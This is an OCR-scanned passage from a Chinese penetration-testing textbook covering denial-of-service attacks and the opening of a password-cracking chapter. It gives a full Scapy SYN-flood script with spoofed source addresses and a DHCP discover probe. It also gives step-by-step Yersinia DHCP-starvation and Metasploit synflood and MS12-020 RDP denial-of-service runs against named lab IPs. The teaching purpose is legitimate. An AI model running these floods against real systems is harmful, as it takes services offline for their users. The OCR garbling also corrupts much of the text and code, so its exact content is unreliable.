27 78.824602608 236.86 212.203 ICMP 42 Echo (ping) request 
28 78.879923216 220.21.135.73 ICMP 42 Echo (ping) request 
29 78.936356448 6.48.63.220 ICMP 42 Echo (ping) request 
30 79.023321573 27.57.169.159 ICMP 42 Echo (ping) request 
31 79 0090028233 158.22 9.121 ICMP 42 Echo (ping) request 
32 79.159223110 169.247.179.222 ICMP 42 Echo (ping) request 
33 79.211415163 B8.144 263.164 ICMP 42 Echo (ping) request 
34 79 _289944684 69.219.60.17 ICMP 42 Echo (ping) request 
35 79381207514 168.85 30.177 ICMP 42 Echo (ping) request 
36 79.450559025 .1 76.236.73.130 ICHP 42 Echo (ping) request 

加 i 


图 9-7 macof 向 网 络 发 送 的 数据 包 
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93 传输 层 的 拒绝 服务 攻击 


基于 TCP 的 拒绝 服务 攻击 则 要 复杂 一 些 ， 但 是 平时 所 说 的 拒绝 服务 攻击 指 的 都 是 基于 
这 个 协议 的 攻击 。 因 为 现实 中 拒绝 攻击 服务 的 对 象 往往 都 是 那些 提供 HTTP 服务 的 服务 器 ， 
H HTTP 提供 支持 的 TCP 自然 也 就 成 了 拒绝 服务 攻击 的 重 灾区 。 

TCP ( Transmission Control Protocol， 传 输 控制 协议 ) 是 一 种 面向 连接 的 、 可 靠 的 、 基 于 
字 节 流 的 传输 层 通信 协议 。TCP 是 因特网 中 的 传输 层 协议 ,使 用 三 次 握手 协议 建立 连接 。 当 
主动 方 发 出 SYN 连接 请 求 后 ， 等 待 对 方 回答 SYN+ACK， 并 最 终 对 对 方 的 SYN 执行 ACK 
确认 。 这 种 建立 连接 的 方法 可 以 防止 产生 错误 的 连接 。TCP 三 次 握手 的 过 程 如 下 。 

(1) 客户 端 向 服务 器 端 发 送 SYN (SEQ=x) 数据 包 ， 并 进入 SYN_SEND 状态 。 

(2) 服务 器 端 在 收 到 客户 端 发 出 的 SYN 报 文 之 后 ， 回 应 一 个 SYN (SEQ=y) 
ACK(ACK=x+1 ) 数据 包 ， 并 进入 SYN_RECY 状态 。 

(3) 客户 端 收 到 服务 器 端的 SYN 数据 包 ， 回 应 一 个 ACK(ACK=y+1 ) 数据 包 ， 进 入 Es- 
tablished 状态 。 

三 次 握手 完成 ，TCP 客户 端 和 服务 器 端 成 功 地 建立 连接 ， 可 以 开始 传输 数据 了 。 这 个 过 
程 如 图 9-8 所 示 。 


图 9-8 TCP 三 次 握手 的 过 程 


不 同 于 针对 ICMP 和 UDP 的 拒绝 服务 攻击 方式 ， 基 于 TOP 的 攻击 方式 是 面向 连接 的 。 
只 需要 和 目标 主机 的 端口 建立 大 量 的 TCP 连接 ， 就 可 以 让 目标 主机 的 连接 表 被 填 满 ， 从 而 不 
会 再 接收 任何 新 的 连接 。 

基于 TCP 的 拒绝 攻击 方式 有 两 种 ， 一 种 是 和 目标 端口 完成 三 次 握手 ， 建 立 一 个 完整 连 
接 ; 另 一 种 是 只 和 目标 端口 完成 三 次 握手 中 的 前 两 次 ， 建 立 的 是 一 个 不 完整 的 连接 ， 如 图 
9-9 所 示 ， 这 种 攻击 方式 是 最 为 常见 的 ， 通 常 将 这 种 攻击 方式 称 为 SYN 拒绝 服务 攻击 。 在 这 
种 攻击 方式 中 ， 攻 击 方 会 向 目标 端口 发 送 大 量 设置 了 SYN 标志 位 的 TCP 数据 包 ， 受 攻击 的 
服务 器 会 根据 这 些 数据 包 建 立 连 接 ， 并 将 连接 的 信息 存储 在 连接 表 中 ， 而 攻击 方 不 断 地 发 送 
SYN 数据 包 ， 很 快 就 会 将 连接 表 填 满 ， 此 时 受 攻击 的 服务 器 就 无 法 接收 新 来 的 连接 请 求 了 。 

接 下 来 考虑 一 下 这 个 程序 的 思路 ， 首 先是 确定 攻击 的 目标 。 例 如 ， 要 攻击 192.168.1.1 上 
的 Web 服务 器 ， 那 么 需要 做 的 就 是 产生 大 量 的 SYN 数据 包 去 连接 192.168.1.1 主机 的 80 端 
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口 。 由 于 是 进行 攻击 ， 所 以 无 须 完成 完整 的 三 次 握手 ， 只 需要 建立 一 个 不 完整 的 连接 即 可 。 


aa 
SYN 


SYN+ACK 


客户 机 


图 9-9 不 完整 的 TCP 连接 
这 样 无 须 使 用 自身 的 I 了 P 地 址 作为 源 地 址 ， 只 需要 使 用 伪造 的 地 址 即 可 。 产 生 随 机 地 址 
的 方法 如 下 所 示 。 


pdst= "%i.%i.%i.%i" % (random.randint(1,254),random.randint(1,254),random. 
randint(1,254),random.randint(1,254)) 


攻击 目标 时 使 用 TCP， 端 口 为 80， 将 标志 位 设置 为 syn。 
TCP (dport=80, flags="S") 


下 面 给 出 完整 的 程序 。 


import sys,random 
from scapy.all import send, IP, TCP 
if len(sys.argv) < 2: 
print " SynFlood.py +target IP" 
sys.exit(0) 
while 1: 
psrc= "%i.%i.%i.%i" % (random.randint (1,254),random.randint(1,254),random. 
randint(1,254),random.randint(1,254)) 
pdst= argv[1] 
send (IP (src=psrc,dst=pdst) /TCP (dport=80, flags="S")) 


执行 这 段 程序 ， 将 参数 设置 为 1.1.1.1， 使 用 WireShark 捕获 这 些 数据 包 ， 执 行 的 结果 如 
图 9-10 所 示 。 


tcp 
Protocol Length Into 

px TCF ErET 
3 TCP 54 20 
7 2.086842177 112,74.103.150 TcP 54 20 — 89 [SYN] 
9 2.561008635 13.127.86.133. TcP 54 20 — 89 [SYN] 
12 4.175573391 238.179 69 151 TCP 54 20 - 89 zm 
14 4681061180 62.45.245.182 I 54 20 ~- 89 [SYN 
15 6 275509030 150.99 156 253 TcP 54 20 = 89 [SVN] 
18 6.780673959 195.178.219.102 TcP 54 20 — 89 [SYN] 
29 8.367894682 125.165,131.31 Ka 54 20 ~ 89 [SYN] 
22 8 885957499 。 57 ,136.245.227 TcP 54 20 — 89 [SYN] 
24 10.400002084 1907.268.110.13S TCP 54 20 — 89 [SYN] 
26 10.996591125 225.169.215.183 TcP 54 20 -= 89 [SYN] 
28 12.568004458 130.47.164.232 TCP 54 20 ~ 89 [SYN] 
39 13 000062068 236.106 28 193 TcP 54 20 = 89 [SVN] 
32 14.667948635 45,190.1064.112 TcP 54 20 — 89 [SVN] 
34 15.187859551 121.151,203.192 Te 5420 — 89 [SYN] 
36 16.759710237 15.184.91.52 TcP 54 20 — 89 [SYN] 
38 17.279793979 108.168,154.87 TCP 5420 - 89 
49 18.861626645 215.60.251 206 TcP 54 20 = 89 [SYN 
42 19.387756178 11.27.143.171 TCP 54 20 — 89 [SYN] 
44 20.971565083 18.76.107.124 TcP 54 20 — 89 [SVN] 
45 21 .488409443 47.72.211.114 TcP 54 20 - 89 [SYN] 
43 23.054227593 56.104.193.98 TcP 54 20 — 89 [SYN] 
59 25.166311351 211.149.249.59 Tc 5420 ~ 89 [SYN] 


图 9-10 产生 各 种 随机 地 址 发 出 的 数据 包 
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94 基于 应 用 层 的 拒绝 服务 攻击 


位 于 应 用 层 的 协议 比较 多 ， 常 见 的 有 HITP、FTP、DNS、DHCP 等 。 这 里 面 的 每 个 协 
议 都 可 能 被 利用 来 发 起 拒绝 服务 攻击 ， 这 里 面 以 其 中 的 DHCP 为 例 , DHCP (Dynamic Host 
Configuration Protocol， 动 态 主 机 配置 协议 ) 通常 被 应 用 在 大 型 的 局 域 网 络 环境 中 ， 主 要 作 
用 是 集中 地 管理 、 分 配 亿 地 址 ， 使 网 络 环境 中 的 主机 动态 地 获得 他 地址 、Gateway 地 址 、 
DNS 服务 器 地 址 等 信息 ， 并 能 够 提升 地 址 的 使 用 率 。 

DHCP 采用 客户 端 /服务 器 模型 ， 主 机 地 址 的 动态 分 配 任 务 由 网 络 主机 驱动 。 当 DHCP 
服务 器 接收 到 来 自 网 络 主机 申请 地 址 的 信息 时 ， 才 会 向 网 络 主机 发 送 相关 的 地 址 配置 等 信 
息 ， 以 实现 网 络 主机 地 址 信息 的 动态 配置 。 一 次 DHCP 的 过 程 如 图 9-11 所 示 。 


客户 端 广播 DHCP Discover 消 息 
Ç 服务 器 提供 地 址 租约 Offer 
Q 客户 端 选 择 并 请 求 Request g 
客户 端 一 DHCP 服 务 器 


图 9-11 DHCP 连接 的 过 程 
DHCP 攻击 的 目标 也 是 服务 器 ， 怀 有 恶意 的 用 户 伪造 大 量 DHCP 请 求 报 文 发 送 到 服务 
器 ， 这 样 DHCP 服务 器 地 址 池 中 的 IP 地 址 会 很 快 就 分 配 完 毕 ， 从 而 导致 合法 用 户 无 法 申请 
AJ IP 地 址 。 同 时 大 量 的 DHCP 请 求 也 会 导致 服务 器 高 负荷 运行 ， 从 而 导致 设备 瘫痪 。 
首先 编写 一 段 程 序 来 搜索 网 络 中 的 DHCP 服务器， 只 需要 在 网 络 中 广播 DHCP 的 
discover 数据 包 ， 源 端口 为 68， 目 标 端口 为 67。 这 个 构造 的 过 程 比 较 麻 烦 ， 涉 及 多 个 层次 。 


dhcp_ discover = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0"”,dst= 
"255.255.255.255") /UDP (sport=68, dport=67) /BOOTP() /DHCP (options=[ ("message- 
type”, "diseover"”), "end"])} 


完整 的 程序 如 下 所 示 。 


from scapy.all import srp, IP,UDP,Ether,BOOTP,DHCP 

dhcp_discover = Ether (dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst= 
"255.255.255.255") /UDP (sport=68, dport=67) /BOOTP() /DHCP (options=[("message- 
type", "discover"),"end"]) 

srp(dhcp discover) 


这 时 可 以 打开 WireShark， 并 将 过 滤器 设置 为 udp， 然 后 执行 上 面 的 这 个 程序 ， 可 以 看 
到 如 图 9-12 所 示 的 过 程 。 
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图 9-12 DHCP 的 Discover 过 程 
分 析 得 到 的 数据 包 ， 可 以 看 出 来 网 络 中 有 一 个 DHCP 服务 器 ， 地 址 为 192.168.169.254。 


这 个 程序 也 可 以 用 来 检测 网 络 中 的 非法 DHCP 服务 器 。 
DHCP 攻击 的 目标 也 是 服务 器 ， 怀 有 恶意 的 用 户 伪造 大 量 DHCP 请 求 报 文 发 送 到 服务 


器 ， 这 样 DHCP 服务 器 地 址 池 中 的 IP 地 址 会 很 快 就 分 配 完 毕 ， 从 而 导致 合法 用 户 无 法 申请 
到 了 P 地址 。 同 时 大 量 的 DHCP 请 求 也 会 导致 服务 器 高 负荷 运行 ， 从 而 导致 设备 瘫痪 。 
在 这 一 节 中 用 到 两 个 工具 ,一 个 是 Yersinia， 这 是 一 个 十 分 强大 的 拒绝 服务 攻击 工具 ， 
另 一 个 是 比较 熟悉 的 Metasploit。 
在 这 里 首先 使 用 Yersinia 进行 DHCP 攻击 实验 ， 这 是 一 款 图 形 化 工具 ， 在 命令 行 中 输入 
“yersinia -G” 就 可 以 以 图 形 化 界面 的 形式 启动 这 款 工具 。 


root@kali: ~ # Yersinia -G 


下 面 就 是 启动 以 后 的 Yersinia 工作 界面 ， 现 在 的 版 本 为 0.73， 如 图 9-13 所 示 。 


l: ` 
Lote L80210 1302.14] DTP | HSRP SL MPLS SIP VIP Yersinia iog 


Th DeviD Interface Coumt Last seen 


图 9-13 Yersinia 工作 界面 


单 击 Launch attack 按钮 选择 攻击 方式 ，Yersinia 提供 了 对 很 多 种 网 络 常 见 协议 的 攻击 方 
式 , 例如 CDP、DHCP、DTP、HSRP、ISL、MPLS、STP、VTP 等 ， 如 图 9-14 所 示 。 
在 Choose attack 对 话 框 中 ， 可 以 选择 要 攻击 的 协议 以 及 具体 的 攻击 方式 ， 这 里 首先 在 上 


面 的 标签 中 选择 DHCP， 如 图 9-15 所 示 。 
基于 DHCP 的 攻击 中 一 共 提 供 了 4 种 发 包 形 式 ， 这 4 种 模式 的 含义 如 下 所 示 。 


(1 ) sending RAW packet: 发 送 原 始 数 据 包 。 
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(2) sending DISCOVER packet : 发 送 请 求 获取 IP 地 址 数据 包 ， 占 用 所 有 的 下， 造成 拒 
绝 服务 。 


Choose attack ee Choose attack 0o00 
[CDP] DHCP 8021Q 802.1X DTP HSRP ISL MPLS STP VIP CDP DHCP 8021Q 8021X DTP HSRP ISL MPLS STP VIP 
Choose attack- Choose attack- 

Description DoS 


Description DoS 
O sending RAW packet E 
° : 
O creating DHCP rogue server C 


@ sending CDP packet 
O flooding CDP table 
O Setting up a virtual device 


O sending RELEASE packet = 


图 9-14 Yersinia 的 攻击 方式 选择 界面 图 9-15 DHCP 服务 攻击 界面 


(3 ) creating DHCP rogue server : 创建 虚假 DHCP 服务 器 ， 让 用 户 连接 ,真正 的 DHCP 
无 法 工作 。 


(4) sending RELEASE packet : 发 送 释放 IP 请 求 到 DHCP 服务 器 ， 致 使 正在 使 用 的 IP 


其 中 ，sending DISCOVER packet 形式 默认 采用 拒绝 服务 攻击 (后 面 的 DoS 复 选 框 中 显 
示 被 选中 状态 )。 选 中 这 个 方法 之 后 单 击 OK 按钮 ， 即 可 开始 攻击 ， 如 图 9-16 所 示 。 


Yersinia 0.7.3 


255 255.255.255 01 DISCOVER eth0 19 Oct 0346:28 
255.255.255.255 01 DISCOVER eth0 19 Oct 0346:28 
255 255.255.255 01 DISCOVER eth0 19 Oct 03:46:28 


255.255.255.255 01 DISCOVER eth0 19oct034628 
255.255.255.255 01 DISCOVER ethO 1904 0346:28 
255.255.255.255 01 DISCOVER ethg 19064 03:46:28 
255.255.255.255 01 DISCOVER ethO 1904 0346:28 


19 Oct 03:46:25, 


图 9-16 使 用 Yersinia 进行 DHCP 攻击 产生 的 数据 包 


执行 攻击 后 ， 右 侧 框 1 处 显示 的 就 是 发 送出 去 的 攻击 数据 包 ， 如 果 希 望 查 看 某 一 个 数据 
包 的 具体 内 容 ， 可 以 单 击 一 个 数据 包 。 在 框 2 处 显示 的 就 是 这 个 数据 包 的 详细 内 容 。 可 以 看 
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到 这 个 工具 不 断 地 向 外 发 送 广播 数据 包 。 
执行 攻击 后 ，Yersinia 就 会 在 本 网 段 内 不 停 地 发 送 DHCP discover 数据 包 ， 很 快 DHCP 
server 地 址 池内 所 有 的 有 效 IP 都 没 法 使 用 ， 新 的 用 户 就 无 法 获取 卫 地 址 ， 整 个 网 络 陷于 瘫 
HRE. 
理论 上 ， 所 有 提供 连接 的 协议 都 可 能 会 受到 拒绝 服务 的 攻击 ，Metasploit 中 提供 了 很 多 
用 于 各 种 协议 的 拒绝 服务 攻击 模块 ， 可 以 启动 Metasploit， 并 在 其 中 查询 使 用 对 应 的 模块 。 
root@kali: ~ # msfconsole 
成 功 启动 Metasploit 之 后 ， 可 以 使 用 search 命令 来 查找 与 DoS (拒绝 服务 攻击 ) 相关 的 
JR. HES 9-17 所 示 


liary/admin/chromecast/chromecast_re: 


normal 
iframe - normal 
normal 
iormal 
Mormal 
normal 
nor 


p/f5 bigip apm max sessions 
ip bomb dos 
ary 
lllary/dos/ht 


heap _bof 


ng_password dos 
xmlrpc dos 


图 9-17 Metasploit 中 的 拒绝 服务 攻击 模块 列表 

这 里 列 出 Metasploit 中 的 所 有 拒绝 服务 攻击 模块 ， 仍 然 使 用 这 里 的 模块 对 目标 进行 一 次 
SYN 拒绝 服务 攻击 。 这 里 可 以 使 用 auxiliary/dos/tcp/synflood 模块 来 完成 这 个 攻击 。 首 先 选 择 
对 应 的 模块 : 

msf > use auxiliary/dos/tcp/synflood 

使 用 show opinions 来 查看 这 个 模块 的 参数 ， 如 图 9-18 所 示 。 

synflood 这 个 模块 需要 的 参数 包括 RHOST、RPORT、SNAPLEN 和 TIMEOUT， 后 面 的 
三 个 参数 都 有 默认 值 ， 所 以 需要 设置 的 只 有 RHOST， 这 也 正 是 要 发 起 拒绝 服务 攻击 服务 器 
HY IP 地 址 。 这 个 目标 必须 是 对 外 提供 HTTP 服务 的 服务 器 。 


Tr 
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msf auxiliary( ) > shov options 
Module options (auxiliary/dos/tcp/synflood) : 


Name 


INTERE ACE e interface 


Number of SYNs to send (else unlimited) 
s 


80 
source address (else randomizes) 
65535 s The number of bytes to 
The source port (else 
TIMEOUT 506 yes The number of second: for new data 


图 9-18 synflood 攻击 模块 的 参数 列表 


将 参数 设置 为 目标 192.168.1.101， 如 图 9-19 所 示 。 


图 9-19 synflood 设置 RHOST 值 


然后 就 可 以 使 用 exploit 命令 发 起 攻击 ， 如 图 9-20 所 示 


msf auxitiary( | 


] SYN flooding 192.168 


图 9-20 启动 synflood 攻击 

很 快 目标 就 会 因为 攻击 而 停止 对 外 的 HTTP 服务 了 

如 果 事 先 获得 了 关于 目标 的 足够 信息 ， 也 可 以 利用 目标 主机 上 Wetan 务 进 行 拒绝 
服务 攻击 。 例 如 很 多 人 都 拥有 两 台 以 上 的 计算 机 ， 一 台 在 单位 ， 另 多 a 家 里 ， 如 果 上 班 
时 间 没 有 完成 全 部 工作 ， 回 到 家 中 可 以 远程 连接 到 单位 的 计算 机 这 需要 计算 机 提供 远 
制 的 服务 ， 微 软 的 Windows 操作 系统 中 就 提供 了 远程 桌面 协议 ， 这 是 一 个 多 通道 的 协 

， 用 户 可 以 利用 这 个 协议 (客户 端 或 称 “本 地 计算 机 ”) 连 上 提供 微软 终端 机 服务 的 计算 村 
务 器 端 或 称 “远程 计算 机 ”) 

但 是 微软 提供 的 这 个 服务 被 发 现存 在 一 个 编号 为 MS12-020 的 漏洞 ，Windows 在 处 理 某 
些 RDP 报 文 时 Terminal Server 存在 错误 ， 可 被 利用 造成 服务 停止 响应 。 默 认 情 况 下 ， 任 何 
Windows 操作 系统 都 未 启用 远程 桌面 协议 (RDP)。 没 有 启用 RDP 的 系统 不 受 威胁 

还 是 在 Metasploit 中 启动 对 应 的 模块 : 


msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 


使 用 “show options” 来 查看 这 个 模块 所 要 使 用 的 参数 ， 如 图 9-21 所 示 。 


nsf auxiliary ) > show options 


Module option: v sr 3 maxchannelids): 


图 9-21 ms12_020_maxchannelids 攻击 模块 的 参数 列表 
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这 个 模块 的 参数 也 十 分 简单 ， 只 需要 设置 一 个 RHOST 即 可 ， 这 也 就 是 目标 的 卫 地 址 ， 
在 这 里 将 其 设置 为 192.168.1.106， 如 图 9-22 所 示 。 


> ST 192.168.1.106 
1.106 


图 9-22 设置 ms12 020_maxchannelids 攻击 模块 的 参数 


设置 完 攻击 目标 之 后 ， 就 可 以 对 目标 发 起 攻击 ， 使 用 run 命令 发 起 攻击 ， 如 图 9-23 所 示 。 


图 9-23 ms12 020 maxchannelids 攻击 结果 


上 面 的 框 中 的 结果 显示 攻击 已 经 成 功 ， 目 标 主机 已 经 关闭 


小 结 


拒绝 服务 攻击 一 直 是 一 个 让 网 络 安全 人 员 感 到 无 比 头疼 的 问题 ， 受 到 这 种 攻击 的 服务 器 
将 无 法 提供 正常 的 服务 。 通 常 所 说 的 拒绝 服务 攻击 一 般 是 指 对 HTTP 服务 器 发 起 的 TCP 连接 
攻击 。 但 实际 上 拒绝 服务 攻击 的 范畴 要 远 远 比 这 更 大 ， 本 章 按照 TCP/IP 协议 的 结构 ， 依 次 
介绍 了 数据 链 路 层 、 网 络 层 、 传 输 层 和 应 用 层 中 协议 的 漏洞 ， 并 讲解 了 如 何 利用 这 些 漏洞 来 
发 起 拒绝 服务 攻击 

Python 几乎 可 以 完成 所 有 的 拒绝 服务 攻击 。 在 本 章 中 ， 就 使 用 Python 分 别 构造 了 基于 
ICMP、UDP、TCP 的 拒绝 服务 攻击 。 之 后 又 使 用 Yersinia 完成 了 针对 DHCP 的 拒绝 服务 攻 
击 。Yersinia 可 以 完美 地 完成 对 各 种 网 络 设备 的 拒绝 服务 攻击 。 在 本 章 的 最 后 介绍 了 如 何 使 
用 Metasploit 来 对 目标 发 起 拒绝 服务 攻击 。 拒 绝 服务 攻击 是 一 种 破坏 力 很 大 的 渗透 方法 ， 在 
对 一 个 测试 目标 采用 这 种 方法 之 前 ， 一 定 要 获得 客户 的 许可 ， 并 事先 做 好 服务 器 停止 服务 的 
准备 。 

本 章 中 介绍 的 都 是 从 一 台 计 算 机 发 起 的 ， 这 也 就 是 拒绝 服务 攻击 ， 而 现在 更 为 常见 的 是 
分 布 式 拒绝 服务 (Distributed Denial of Service, DDoS) 攻击 ， 这 种 攻击 方式 借助 于 客户 机 / 
服务 器 技术 ， 将 多 个 计算 机 联合 起 来 作为 攻击 平台 ， 对 一 个 或 多 个 目标 发 动 DDoS 攻击 ， 从 
而 成 倍 地 提高 拒绝 服务 攻击 的 威力 。 
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网 络 的 发 展 正在 逐步 改变 人 们 的 生活 和 工作 方式 。 人 们 现在 越 来 越 依赖 网 络 上 的 各 种 应 
M, 例如， 进行 通信 的 时 候 ， 通 常 的 方式 是 使 用 即时 通信 软件 QQ、 微 信 或 者 电子 邮箱 ; 而 
进行 购物 的 时 候 ， 支 付 宝 、 微 信 支 付 以 及 各 种 银行 的 支付 方式 也 逐渐 取代 现金 的 交易 方式 。 
这 些 应 用 十 分 便利 ,无 论 你 在 哪里 ， 只 要 找到 一 台 可 以 连 上 互联 网 的 计算 机 ， 都 可 以 轻 而 
易 举 地 使 用 这 些 应 用 。 但 是 这 些 应 用 必须 有 一 种 可 靠 的 身份 验证 模式 ， 这 种 模式 指 的 是 计 
算 机 及 其 应 用 对 操作 者 身份 的 确认 过 程 ， 从 而 确定 该 用 户 是 否 具有 对 某 种 资源 的 访问 和 使 
用 权限 。 

目前 最 为 常见 的 身份 验证 模式 采用 的 仍然 是 “用 户 名 十 密码 ”的 方式 ， 用 户 自 行 设 定 密 
码 ， 在 登录 时 如 果 输 入 正确 的 密码 ， 计 算 机 就 会 认为 操作 者 是 合法 用 户 。 但 是 这 种 认证 方式 
的 缺陷 也 很 明显 ， 如 何 保证 密码 不 被 泄露 以 及 不 被 破解 已 经 成 为 网 络 安全 的 最 大 问题 之 一 。 
本 章 中 将 介绍 基于 Python 实现 的 密码 破解 。 密 码 破 解 是 指 利用 各 种 手段 获得 网 络 、 系 统 或 资 
源 密 码 的 过 程 。 

在 本 章 中 会 对 平时 所 使 用 的 几 种 常见 应 用 进行 身份 认证 的 攻击 ， 这 几 种 应 用 都 采用 了 密 
码 的 认证 方式 ， 本 章 将 围绕 以 下 几 点 展开 。 

(1) 简单 网 络 服务 认证 的 攻击 。 

(2) 使 用 Python 编写 字典 工具 。 

(3 ) 使 用 Python 编写 各 种 服务 认证 的 破解 模块 。 

(4) 使 用 Brup Suite 对 网 络 认证 服务 的 攻击 。 


令 
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10.1 简单 网 络 服务 认证 的 攻击 


网 络 上 很 多 常见 的 应 用 都 采用 了 密码 认证 的 模式 ， 例 如 FTP、Telnet、SSH 等 ， 这 些 应 
用 被 广泛 地 应 用 在 各 种 网 络 设备 上 ， 如 果 这 些 认证 模式 出 现 了 问题 ， 那 就 意味 着 网 络 中 的 
大 量 设备 将 会 沦陷 。 遗 憾 的 是 ， 目 前 确实 有 很 多 网 络 的 设备 因为 密码 设置 不 够 强壮 已 经 遭 
到 入 侵 。 

针对 这 些 简单 的 网 络 服务 认证 ， 可 以 采用 一 种 “暴力 破解 ”的 方法 。 这 种 方法 的 思路 很 
简单 ， 就 是 把 所 有 可 能 的 密码 都 尝试 一 遍 ， 通 常 可 以 将 这 些 密码 保存 为 一 个 字典 文件 。 实 现 
起 来 一 般 有 如 下 三 种 思路 。 

(1) 纯 字典 攻击 。 这 种 思路 最 为 简单 ， 攻 击 者 只 需要 利用 攻击 工具 将 用 户 名 和 字典 文件 
中 的 密码 组 合 起 来 ， 一 个 个 地 进行 尝试 即 可 。 破 解 成 功 的 概率 与 选用 的 字典 有 很 大 的 关系 ， 
因为 目标 用 户 通常 不 会 选用 毫 无 意义 的 字符 组 合作 为 密码 ， 所 以 对 目标 用 户 有 一 定 的 了 解 可 
以 帮助 更 好 地 选择 字典 。 以 作者 的 经 验 而 言 ， 大 多 数字 典 文件 都 是 以 英文 单词 为 主 ， 这 些 字 
典 文件 更 适用 于 破解 以 英语 为 第 一 语言 用 户 的 密码 ， 对 于 破解 母语 非 英 语 的 用 户 设置 的 密码 
效果 并 不 好 。 

(2) 混合 攻击 。 现 在 的 各 种 应 用 对 密码 的 强壮 度 都 有 了 限制 ， 例 如 ， 在 注册 一 些 应 用 
的 时 候 ， 通 常 都 不 允许 使 用 “123456” 或 者 “aaaaaaa” 这 种 单纯 的 数字 和 字母 的 组 合 ， 因 
此 很 多 人 会 采用 字符 + 数字 的 密码 方式 ， 例 如 ， 使 用 某 人 的 名 字 加 上 生日 就 是 一 种 很 常见 
的 密码 (很 多 人 都 以 自己 孩子 的 英文 名 字 加 出 生日 期 作为 密码 )， 如 果 仅 使 用 一 些 常见 的 英 
文 单词 作为 字典 的 内 容 ， 显 然 具 有 一 定 的 局 限 性 。 而 混合 攻击 则 是 依靠 一 定 的 算法 对 字典 
文件 中 的 单词 进行 处 理 之 后 再 使 用 。 一 个 最 简单 的 算法 就 是 在 这 些 单词 前 面 或 者 后 面 添加 
一 些 常见 的 数字 ， 例 如 一 个 单词 “ test”， 经 过 算法 处 理 之 后 就 会 变 成 “ testl”“ test2”… 
“test1981”“test19840123” 等 。 

(3 ) 完全 暴力 攻击 。 这 是 一 种 最 为 粗暴 的 攻击 方 
式 ， 实际 上 这 种 方式 并 不 需要 字典 ， 而 是 由 攻击 工具 
将 所 有 的 密码 穷 举 出 来 ， 这 种 攻击 方式 通常 需要 很 长 
的 时 间 ， 也 是 最 为 不 可 行 的 一 种 方式 。 但 是 在 一 些 里 
期 的 系统 中 ， 都 采用 了 6 位 长 度 的 纯 数字 密码 ， 这 种 
方法 则 是 非常 有 效 的 。 一 

图 10-1 给 出 了 一 个 使 用 认证 登录 的 界面 ，IP 地 址 2 
为 192.168.1.103 的 服务 器 上 提供 了 FTP 服务， 这 个 服 
务 的 拥有 者 将 密码 提供 给 了 合法 的 用 户 。 用 户 通过 密 
码 认证 之 后 就 可 以 访问 里 面 的 资源 了 。 图 10-1 一 个 FTP 的 身份 验证 界面 


需要 进行 身份 验证 


ftp://192.168.1.103 服务 器 要 求 提供 用 户 名 和 密码 。 
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10.2 ”破解 密码 字典 


前 面 介绍 了 使 用 破解 字典 文件 中 的 内 容 作 为 密码 逐个 去 尝试 ， 常 见 的 字典 文件 一 般 是 txt 
或 者 dic 格式 ， 图 10-2 就 给 出 了 一 个 常见 的 破解 字典 文件 。 


webmaster 
mail 

user 

web 

data 
database 
oracle 
sybase 
ftp 

guest 
test 
master 
account 
access 
backup 
server 


图 10-2 一 个 常见 的 破解 字典 文件 

在 很 多 影视 作品 中 都 会 看 到 这 样 的 情节 ， 某 黑客 信 拆 旦 旦 地 保证 “一 天 之 内 我 就 可 以 攻 
破 这 个 系统 ”， 然 后 就 是 特效 ， 屏 幕 上 一 个 又 一 个 词汇 不 断 变换 。 这 个 过 程 正 如 在 10.1 节 中 
讲 过 的 一 样 ， 当 对 密码 进行 破解 的 时 候 ， 一 个 词典 文件 是 必 不 可 少 的 。 所 谓 的 词典 文件 就 是 
一 个 由 大 量词 汇 构成 的 文件 。 

在 Kali Linux 2 系统 中 词典 文件 的 来 源 一 共有 以 下 三 个 。 

(1) 使 用 字典 生成 工具 来 制造 自己 需要 的 字典 ， 当 需要 字典 文件 ， 手 头 又 没有 合适 的 字 
典 文件 时 ， 就 可 以 考虑 使 用 工具 来 生成 所 需要 的 字典 文件 。 

(2) 使 用 Kali Linux 中 自 带 的 字典 ，Kali Linux 中 将 所 有 的 字典 都 保存 在 /usr/share/ 
wordlists/ 目录 下 ， 如 图 10-3 所 示 。 
Or J 


会 Home 


ee E E = = Bš 


dirb dirbuster 。 dnsmap.bt fasttrack.txt — fern-wlfi 
口 Documents 


E 5s E = š 


metasploit nmap.lst rockyou.txt. sqlmap.txt  wfuzz 
gz 


Ji Music 


图 10-3 Kali Linux 2 中 自 带 的 字典 


(3) 从 互联 网 上 下 载 热门 的 字典 ， 读 者 可 以 访问 https://wiki.skullsecurity.org/Passwords 
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查看 最 新 的 字典 文件 ， 如 图 10-4 所 示 。 


ee | [ discussion | | vier mewes | | history 


Passwords 


HEY FKD IF you like this page, please omsider apportimg ne on PatreoniFI 


tesla /woras/ete, designed for cracarg pasmwords, As far ar I brow, I'n pet bresking ay licensing agreements by mirroring then with credit 


rron sites. I'n hosting them becmise t seems lira mbedy else does (hopefully 1+ 3 t because hostong then 3s dllegal :)). Naturally, I'n 
Supply wemames 一 if you do beve a good reason email me (rorrat-shullsscurity.nst) and T ll see if I have then. 
est paeemrd lists. 


图 10-4 skullsecurity.org 中 带 的 字典 
生成 字典 需要 至 少 指定 如 下 两 项 。 

(1 ) 字典 中 包含 词汇 (也 就 是 密码 ) 的 长 度 。 

(2) Eee 要 生成 密码 包含 的 字符 集 (小 写字 符 、 大 写字 符 、 
数字 、 符 号 )， 这 个 选项 是 可 选 的 ， 如 果 不 写 这 个 选项 ， 将 使 用 默认 字符 集 (默认 为 小 写字 
符 )。 

下 面 使 用 Python 来 编写 一 个 生成 字典 的 程序 ， 在 这 个 程序 中 需要 使 用 到 一 个 新 的 模块 : 
itertools。 这 个 模块 是 Python 内 置 的 ， 使 用 起 来 很 简单 而 且 功能 十 分 强大 。 

首先 介绍 一 下 itertools， 在 这 个 模块 中 提供 了 很 多 函数 ， 其 中 最 为 基础 的 是 三 个 无 穷 循 
IRA o 

(1) count() 函数 : Sega i 例如 count (1,5 )， 生 成 从 1 F 
始 的 循环 器 ， saya w Bh, 6,. T, 16, 21, 26.5 

(2 ) cycle() 函数 : Oo snn s 例如 cycle(hello)， 将 序列 中 
的 元 素 重 复 , 即 h, e, 1, 1, o, h, e, 1, 1, 0, h, “0 

(3 ) repeat() 函数 : 这 个 函数 的 作用 是 重复 元 素 ， 构 成 无 穷 循环 器 ， 例 如 Repeat ( 100 ), 
EJ 100，100，100，100，…。 
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除了 这 些 基本 的 函数 之 外 ， 还 有 一 些 用 来 实现 循环 器 的 组 合 操作 的 函数 ， 这 些 函 数 适 用 
